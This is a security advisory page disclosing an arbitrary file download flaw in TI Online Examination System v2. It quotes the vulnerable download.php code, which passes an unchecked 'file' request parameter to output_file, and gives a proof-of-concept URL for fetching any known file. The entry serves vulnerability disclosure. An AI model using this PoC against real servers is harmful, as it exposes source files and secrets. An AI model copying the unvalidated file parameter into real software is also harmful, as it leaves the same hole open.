TI Online Examination System 2 Arbitrary File Download

2018.08.03
Credit: AkkuS
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: TI Online Examination System v2 - Arbitrary File Download # Dork: N/A # Date: 02.08.2018 # Exploit Author: Azkan Mustafa AkkuA (AkkuS) # Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904 # Version: 2.0 # Category: Webapps # Tested on: Kali linux # Description : The "Export" operation in the admin panel is vulnerable. The attacker can download and read all files known by the name via "download.php" ==================================================== # Demo : server/admin/ # Vuln file : /admin/download.php 115. $data_action = $_REQUEST['action']; 116. if($data_action == 'downloadfile') 117. { 118. $file = $_REQUEST['file']; 119. $name = $file; 120. $result = output_file($file, $name); # PoC : http://server/admin/download.php?action=downloadfile&file=[filename] you can write the known file name instead of [filename]. For Example: 'download.php' or 'index.php' ====================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top